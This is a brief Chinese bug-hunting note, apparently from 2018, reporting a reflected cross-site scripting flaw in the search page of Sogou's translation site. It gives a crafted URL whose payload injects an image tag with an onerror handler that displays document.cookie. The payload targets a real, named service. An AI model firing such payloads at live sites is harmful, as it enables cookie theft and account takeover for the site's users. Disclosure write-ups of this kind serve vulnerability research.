[关闭]
@1kbfree 2018-11-09T14:40:46.000000Z 字数 195 阅读 995

搜索处存在反射xss

漏洞挖掘


1、打开Url:http://fanyi.sogou.com/?fr=websearch

image.png-66.7kB

2、发现可以解析html,直接构造payload

  1. http://fanyi.sogou.com/?fr=websearch#zh-CHS/en/123%22%3E%3Cimg%2Fsrc%3D'x'%2Fonerror%3Dalert(document.cookie)%3E

image.png-148.4kB

添加新批注
在作者公开此批注前,只有你和作者可见。
回复批注